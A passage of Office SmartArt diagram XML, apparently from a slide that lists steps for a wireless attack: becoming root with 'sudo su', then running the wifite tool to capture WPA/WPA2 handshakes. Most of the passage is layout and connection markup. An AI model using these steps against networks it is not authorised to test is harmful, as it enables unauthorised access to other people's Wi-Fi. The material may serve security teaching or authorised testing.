      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AE6038C3-F2A9-46D9-B693-5A0BE5EFC5A7}" type="parTrans" cxnId="{8D37C227-F8F4-47D4-B906-05DA9DFF7FA3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{61D0F6CF-F900-4105-A36C-78D8898B2204}" type="sibTrans" cxnId="{8D37C227-F8F4-47D4-B906-05DA9DFF7FA3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4966D864-64C7-4EF7-AA86-C599C5DF076F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Command: sudo su (To enter super user).</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CA575830-BB7F-4D5B-889B-C98323802B3D}" type="parTrans" cxnId="{F01B27D2-399A-485F-9DF3-431CB4FDD38B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A9AD80EB-D61B-4B91-BC31-C685ED0A04EF}" type="sibTrans" cxnId="{F01B27D2-399A-485F-9DF3-431CB4FDD38B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{21BBA703-533A-466B-80B9-AB89287F09C2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1"/>
            <a:t>Step 2: Wifite</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AB60A07A-4BE4-4B77-B173-9A408065B423}" type="parTrans" cxnId="{38E1C4D3-C6A8-41A2-900C-7E148A4713F8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0D841731-DA9E-4E1F-BECD-C2D74021F254}" type="sibTrans" cxnId="{38E1C4D3-C6A8-41A2-900C-7E148A4713F8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{127E5CBC-5045-41EB-90DC-2F8F457EBAB0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>After entering the super user.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A472D108-CFD1-476E-B44B-F27B5A93F23F}" type="parTrans" cxnId="{0215ED5C-CA9D-406B-8020-F547DA4F31C5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{39EF97F1-A6C4-4FB7-9C06-6A9FC2395B80}" type="sibTrans" cxnId="{0215ED5C-CA9D-406B-8020-F547DA4F31C5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{80BEBE1F-B18D-4FE3-AF47-C36AA39B78D4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Command:wifite</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{521422EA-99B7-4F19-BC92-06F7519A5E81}" type="parTrans" cxnId="{E8D6657A-32DF-4101-AE12-04CB56804EF8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CD76B1A0-D695-44BF-B4F6-61398B421E3F}" type="sibTrans" cxnId="{E8D6657A-32DF-4101-AE12-04CB56804EF8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D6C6C974-F184-4756-902A-E23CC856FC9F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>To capture WPA/WPA2 handshake. </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9B977CFB-3779-4277-ADE5-8DE8BC3C94C8}" type="parTrans" cxnId="{BEA2B749-5438-4E73-9153-945AE2864812}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A78ECC5A-7D4A-471D-A487-CA44A4EFCC1E}" type="sibTrans" cxnId="{BEA2B749-5438-4E73-9153-945AE2864812}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AC3D2A1C-36F9-4F47-B966-45D8BD3BC508}" type="pres">
      <dgm:prSet presAssocID="{C3C10532-8706-4429-8EEA-2ECE95C9D6C3}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5498CFF6-39A5-254E-9A2A-42C819D2A98F}" type="pres">
      <dgm:prSet presAssocID="{914C98BF-A8AF-4A45-836D-A726C2ED3E92}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{01C46383-24A4-5944-BC31-7DC4586B7778}" type="pres">
      <dgm:prSet presAssocID="{91D4327E-40A4-4419-A561-05E70E860A68}" presName="sibTrans" presStyleLbl="sibTrans1D1" presStyleIdx="0" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{25F23980-EBC5-8848-AC22-AB213FF8434E}" type="pres">
      <dgm:prSet presAssocID="{91D4327E-40A4-4419-A561-05E70E860A68}" presName="connectorText" presStyleLbl="sibTrans1D1" presStyleIdx="0" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BD8E1E17-CD1F-2E4B-91CE-5FCB5731E5E8}" type="pres">
      <dgm:prSet presAssocID="{237E6521-CA78-460C-9588-C99976020E61}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0100C1DC-E936-4E40-8082-D5A4C4E830B2}" type="pres">
      <dgm:prSet presAssocID="{8413A2DF-E5C8-401C-82F0-75DCF50F6ABA}" presName="sibTrans" presStyleLbl="sibTrans1D1" presStyleIdx="1" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EFCFBF3D-D492-C94D-BB67-53011F39B370}" type="pres">
      <dgm:prSet presAssocID="{8413A2DF-E5C8-401C-82F0-75DCF50F6ABA}" presName="connectorText" presStyleLbl="sibTrans1D1" presStyleIdx="1" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D3BB758F-6169-FF41-A36E-20922ACF89E8}" type="pres">
      <dgm:prSet presAssocID="{C7B3C524-5D5F-4E1F-A606-2AA699CBB6F7}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E50C3630-D6A7-DA4C-BEB8-7539E6D9BEC3}" type="pres">
      <dgm:prSet presAssocID="{61D0F6CF-F900-4105-A36C-78D8898B2204}" presName="sibTrans" presStyleLbl="sibTrans1D1" presStyleIdx="2" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BE9BABEA-A5F0-CC49-890C-9D94E7724CB0}" type="pres">
      <dgm:prSet presAssocID="{61D0F6CF-F900-4105-A36C-78D8898B2204}" presName="connectorText" presStyleLbl="sibTrans1D1" presStyleIdx="2" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AC5DAED5-83D4-E74F-8158-F56233BE17CB}" type="pres">
      <dgm:prSet presAssocID="{4966D864-64C7-4EF7-AA86-C599C5DF076F}" presName="node" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1C430CB4-3EFC-644D-A8CF-24230DEC34DD}" type="pres">
      <dgm:prSet presAssocID="{A9AD80EB-D61B-4B91-BC31-C685ED0A04EF}" presName="sibTrans" presStyleLbl="sibTrans1D1" presStyleIdx="3" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5AB31BF8-A3C4-B34E-B693-073231E5FF20}" type="pres">
      <dgm:prSet presAssocID="{A9AD80EB-D61B-4B91-BC31-C685ED0A04EF}" presName="connectorText" presStyleLbl="sibTrans1D1" presStyleIdx="3" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0B55845F-BEF7-104F-8CD4-C229B0697BF5}" type="pres">
      <dgm:prSet presAssocID="{21BBA703-533A-466B-80B9-AB89287F09C2}" presName="node" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{981AE960-44EB-A54E-BB4A-7242EC928243}" type="pres">
      <dgm:prSet presAssocID="{0D841731-DA9E-4E1F-BECD-C2D74021F254}" presName="sibTrans" presStyleLbl="sibTrans1D1" presStyleIdx="4" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BD77F850-5F34-8540-82B9-10F36796C84B}" type="pres">
      <dgm:prSet presAssocID="{0D841731-DA9E-4E1F-BECD-C2D74021F254}" presName="connectorText" presStyleLbl="sibTrans1D1" presStyleIdx="4" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C7434790-D7E9-8444-9B06-F89526A28B96}" type="pres">
      <dgm:prSet presAssocID="{127E5CBC-5045-41EB-90DC-2F8F457EBAB0}" presName="node" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A9D6A0F6-4889-6A45-990C-0E39F9A11B49}" type="pres">
      <dgm:prSet presAssocID="{39EF97F1-A6C4-4FB7-9C06-6A9FC2395B80}" presName="sibTrans" presStyleLbl="sibTrans1D1" presStyleIdx="5" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{ADBD7891-7C19-D341-A912-E350D48E4444}" type="pres">
      <dgm:prSet presAssocID="{39EF97F1-A6C4-4FB7-9C06-6A9FC2395B80}" presName="connectorText" presStyleLbl="sibTrans1D1" presStyleIdx="5" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E50D64C6-BBF9-964F-AEA3-CB268D4E18FD}" type="pres">
      <dgm:prSet presAssocID="{80BEBE1F-B18D-4FE3-AF47-C36AA39B78D4}" presName="node" presStyleLbl="node1" presStyleIdx="6" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{475506ED-F649-FB4E-B8BA-B7600C18EBA6}" type="pres">
      <dgm:prSet presAssocID="{CD76B1A0-D695-44BF-B4F6-61398B421E3F}" presName="sibTrans" presStyleLbl="sibTrans1D1" presStyleIdx="6" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EAB9BA14-560A-BE46-95D4-6F5B057160B5}" type="pres">
      <dgm:prSet presAssocID="{CD76B1A0-D695-44BF-B4F6-61398B421E3F}" presName="connectorText" presStyleLbl="sibTrans1D1" presStyleIdx="6" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{29683069-108C-424A-BD53-CD1E24E46F27}" type="pres">
      <dgm:prSet presAssocID="{D6C6C974-F184-4756-902A-E23CC856FC9F}" presName="node" presStyleLbl="node1" presStyleIdx="7" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{90960B10-D549-B240-BA57-9598FA61C348}" type="presOf" srcId="{0D841731-DA9E-4E1F-BECD-C2D74021F254}" destId="{BD77F850-5F34-8540-82B9-10F36796C84B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{2600CA19-1A6E-5043-92F0-F297CD3AF5D8}" type="presOf" srcId="{8413A2DF-E5C8-401C-82F0-75DCF50F6ABA}" destId="{EFCFBF3D-D492-C94D-BB67-53011F39B370}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{8D37C227-F8F4-47D4-B906-05DA9DFF7FA3}" srcId="{C3C10532-8706-4429-8EEA-2ECE95C9D6C3}" destId="{C7B3C524-5D5F-4E1F-A606-2AA699CBB6F7}" srcOrd="2" destOrd="0" parTransId="{AE6038C3-F2A9-46D9-B693-5A0BE5EFC5A7}" sibTransId="{61D0F6CF-F900-4105-A36C-78D8898B2204}"/>
    <dgm:cxn modelId="{06171128-46D9-CE4B-949A-59E3F3F03A6D}" type="presOf" srcId="{91D4327E-40A4-4419-A561-05E70E860A68}" destId="{01C46383-24A4-5944-BC31-7DC4586B7778}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{D7460135-642F-0D49-9D88-86DB9DA90A37}" type="presOf" srcId="{80BEBE1F-B18D-4FE3-AF47-C36AA39B78D4}" destId="{E50D64C6-BBF9-964F-AEA3-CB268D4E18FD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{B1905338-1487-274F-9815-F471E30D24E4}" type="presOf" srcId="{A9AD80EB-D61B-4B91-BC31-C685ED0A04EF}" destId="{1C430CB4-3EFC-644D-A8CF-24230DEC34DD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{63B63C3C-245B-664D-8730-E2E45A76B657}" type="presOf" srcId="{39EF97F1-A6C4-4FB7-9C06-6A9FC2395B80}" destId="{ADBD7891-7C19-D341-A912-E350D48E4444}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{BEA2B749-5438-4E73-9153-945AE2864812}" srcId="{C3C10532-8706-4429-8EEA-2ECE95C9D6C3}" destId="{D6C6C974-F184-4756-902A-E23CC856FC9F}" srcOrd="7" destOrd="0" parTransId="{9B977CFB-3779-4277-ADE5-8DE8BC3C94C8}" sibTransId="{A78ECC5A-7D4A-471D-A487-CA44A4EFCC1E}"/>
    <dgm:cxn modelId="{4D46DB51-FFBD-4A96-9326-6FFDE5F75DA4}" srcId="{C3C10532-8706-4429-8EEA-2ECE95C9D6C3}" destId="{914C98BF-A8AF-4A45-836D-A726C2ED3E92}" srcOrd="0" destOrd="0" parTransId="{173F2B88-AC8A-406D-B6A7-6F210B04E5F2}" sibTransId="{91D4327E-40A4-4419-A561-05E70E860A68}"/>
    <dgm:cxn modelId="{0215ED5C-CA9D-406B-8020-F547DA4F31C5}" srcId="{C3C10532-8706-4429-8EEA-2ECE95C9D6C3}" destId="{127E5CBC-5045-41EB-90DC-2F8F457EBAB0}" srcOrd="5" destOrd="0" parTransId="{A472D108-CFD1-476E-B44B-F27B5A93F23F}" sibTransId="{39EF97F1-A6C4-4FB7-9C06-6A9FC2395B80}"/>
    <dgm:cxn modelId="{EA3CA962-9478-5C42-B024-CA55D2A3D116}" type="presOf" srcId="{C3C10532-8706-4429-8EEA-2ECE95C9D6C3}" destId="{AC3D2A1C-36F9-4F47-B966-45D8BD3BC508}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{E0D52464-CC64-F043-A8BF-4F81736DE359}" type="presOf" srcId="{8413A2DF-E5C8-401C-82F0-75DCF50F6ABA}" destId="{0100C1DC-E936-4E40-8082-D5A4C4E830B2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{06FBE164-2FA1-3847-958F-F1A82869F62E}" type="presOf" srcId="{61D0F6CF-F900-4105-A36C-78D8898B2204}" destId="{BE9BABEA-A5F0-CC49-890C-9D94E7724CB0}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{9F738669-377E-6F4A-A7DA-BE1321FE807C}" type="presOf" srcId="{914C98BF-A8AF-4A45-836D-A726C2ED3E92}" destId="{5498CFF6-39A5-254E-9A2A-42C819D2A98F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{E8D6657A-32DF-4101-AE12-04CB56804EF8}" srcId="{C3C10532-8706-4429-8EEA-2ECE95C9D6C3}" destId="{80BEBE1F-B18D-4FE3-AF47-C36AA39B78D4}" srcOrd="6" destOrd="0" parTransId="{521422EA-99B7-4F19-BC92-06F7519A5E81}" sibTransId="{CD76B1A0-D695-44BF-B4F6-61398B421E3F}"/>
    <dgm:cxn modelId="{BEE9BD7F-00D7-6441-82E7-1AF3421FD53D}" type="presOf" srcId="{91D4327E-40A4-4419-A561-05E70E860A68}" destId="{25F23980-EBC5-8848-AC22-AB213FF8434E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{FCA2A58E-428C-6E42-BC3A-379767964A0C}" type="presOf" srcId="{237E6521-CA78-460C-9588-C99976020E61}" destId="{BD8E1E17-CD1F-2E4B-91CE-5FCB5731E5E8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{1CC7D798-D2CA-2E4D-B48E-375EE10F6383}" type="presOf" srcId="{D6C6C974-F184-4756-902A-E23CC856FC9F}" destId="{29683069-108C-424A-BD53-CD1E24E46F27}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{A79CBD99-6642-8941-81FA-1C2B250BF7E2}" type="presOf" srcId="{0D841731-DA9E-4E1F-BECD-C2D74021F254}" destId="{981AE960-44EB-A54E-BB4A-7242EC928243}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{0713BCAA-A05A-EF4A-A984-CB2E48D4E72F}" type="presOf" srcId="{CD76B1A0-D695-44BF-B4F6-61398B421E3F}" destId="{EAB9BA14-560A-BE46-95D4-6F5B057160B5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{51AA50AD-337E-264C-8195-789FEA055905}" type="presOf" srcId="{4966D864-64C7-4EF7-AA86-C599C5DF076F}" destId="{AC5DAED5-83D4-E74F-8158-F56233BE17CB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{8CE3D6B4-3A73-694D-8CA5-388B0A954BDF}" type="presOf" srcId="{A9AD80EB-D61B-4B91-BC31-C685ED0A04EF}" destId="{5AB31BF8-A3C4-B34E-B693-073231E5FF20}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{87F64DCF-A8FA-F940-97D1-BFEF15DCD16C}" type="presOf" srcId="{21BBA703-533A-466B-80B9-AB89287F09C2}" destId="{0B55845F-BEF7-104F-8CD4-C229B0697BF5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{F01B27D2-399A-485F-9DF3-431CB4FDD38B}" srcId="{C3C10532-8706-4429-8EEA-2ECE95C9D6C3}" destId="{4966D864-64C7-4EF7-AA86-C599C5DF076F}" srcOrd="3" destOrd="0" parTransId="{CA575830-BB7F-4D5B-889B-C98323802B3D}" sibTransId="{A9AD80EB-D61B-4B91-BC31-C685ED0A04EF}"/>
    <dgm:cxn modelId="{38E1C4D3-C6A8-41A2-900C-7E148A4713F8}" srcId="{C3C10532-8706-4429-8EEA-2ECE95C9D6C3}" destId="{21BBA703-533A-466B-80B9-AB89287F09C2}" srcOrd="4" destOrd="0" parTransId="{AB60A07A-4BE4-4B77-B173-9A408065B423}" sibTransId="{0D841731-DA9E-4E1F-BECD-C2D74021F254}"/>
    <dgm:cxn modelId="{C9ACD6D7-9B17-3241-A579-B0E712C3C1E0}" type="presOf" srcId="{39EF97F1-A6C4-4FB7-9C06-6A9FC2395B80}" destId="{A9D6A0F6-4889-6A45-990C-0E39F9A11B49}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{8C81A3E3-EA93-2F4B-BAC5-A385974F5180}" type="presOf" srcId="{C7B3C524-5D5F-4E1F-A606-2AA699CBB6F7}" destId="{D3BB758F-6169-FF41-A36E-20922ACF89E8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{7AD436EB-5462-4ADE-9B61-2862BCBF9E6F}" srcId="{C3C10532-8706-4429-8EEA-2ECE95C9D6C3}" destId="{237E6521-CA78-460C-9588-C99976020E61}" srcOrd="1" destOrd="0" parTransId="{B12547A4-339A-4C9F-9563-0C70E460E788}" sibTransId="{8413A2DF-E5C8-401C-82F0-75DCF50F6ABA}"/>
    <dgm:cxn modelId="{8A237CEC-9290-0D45-AA90-BF44FEAF6DAA}" type="presOf" srcId="{127E5CBC-5045-41EB-90DC-2F8F457EBAB0}" destId="{C7434790-D7E9-8444-9B06-F89526A28B96}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{F9DBD4EF-C84D-8D41-A8A1-9100E841BD86}" type="presOf" srcId="{CD76B1A0-D695-44BF-B4F6-61398B421E3F}" destId="{475506ED-F649-FB4E-B8BA-B7600C18EBA6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{E2909BFF-98FD-DF4A-844A-72D163F84D36}" type="presOf" srcId="{61D0F6CF-F900-4105-A36C-78D8898B2204}" destId="{E50C3630-D6A7-DA4C-BEB8-7539E6D9BEC3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{34DC3BCC-3183-5742-8D6E-E3B6830A9345}" type="presParOf" srcId="{AC3D2A1C-36F9-4F47-B966-45D8BD3BC508}" destId="{5498CFF6-39A5-254E-9A2A-42C819D2A98F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{9725FB29-11A6-CD43-BA22-243250C8FD8F}" type="presParOf" srcId="{AC3D2A1C-36F9-4F47-B966-45D8BD3BC508}" destId="{01C46383-24A4-5944-BC31-7DC4586B7778}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{18F9E832-4356-7D40-BC7E-6C1887416121}" type="presParOf" srcId="{01C46383-24A4-5944-BC31-7DC4586B7778}" destId="{25F23980-EBC5-8848-AC22-AB213FF8434E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{01807228-3707-584A-9BA7-492A3F0583B4}" type="presParOf" srcId="{AC3D2A1C-36F9-4F47-B966-45D8BD3BC508}" destId="{BD8E1E17-CD1F-2E4B-91CE-5FCB5731E5E8}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{88026E42-A596-C44C-964B-89E339DBD07B}" type="presParOf" srcId="{AC3D2A1C-36F9-4F47-B966-45D8BD3BC508}" destId="{0100C1DC-E936-4E40-8082-D5A4C4E830B2}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{702A5C10-19D8-054E-BC5F-110A2C28313D}" type="presParOf" srcId="{0100C1DC-E936-4E40-8082-D5A4C4E830B2}" destId="{EFCFBF3D-D492-C94D-BB67-53011F39B370}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{F582BB26-E4AB-1944-994D-F23B461C8400}" type="presParOf" srcId="{AC3D2A1C-36F9-4F47-B966-45D8BD3BC508}" destId="{D3BB758F-6169-FF41-A36E-20922ACF89E8}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{41EB65A8-B1F3-0D44-9B9D-136FBC297A7B}" type="presParOf" srcId="{AC3D2A1C-36F9-4F47-B966-45D8BD3BC508}" destId="{E50C3630-D6A7-DA4C-BEB8-7539E6D9BEC3}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{1A65B934-4F06-FE40-894F-F5F4695DF033}" type="presParOf" srcId="{E50C3630-D6A7-DA4C-BEB8-7539E6D9BEC3}" destId="{BE9BABEA-A5F0-CC49-890C-9D94E7724CB0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{37077875-B745-A547-8A4F-157885B00769}" type="presParOf" srcId="{AC3D2A1C-36F9-4F47-B966-45D8BD3BC508}" destId="{AC5DAED5-83D4-E74F-8158-F56233BE17CB}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
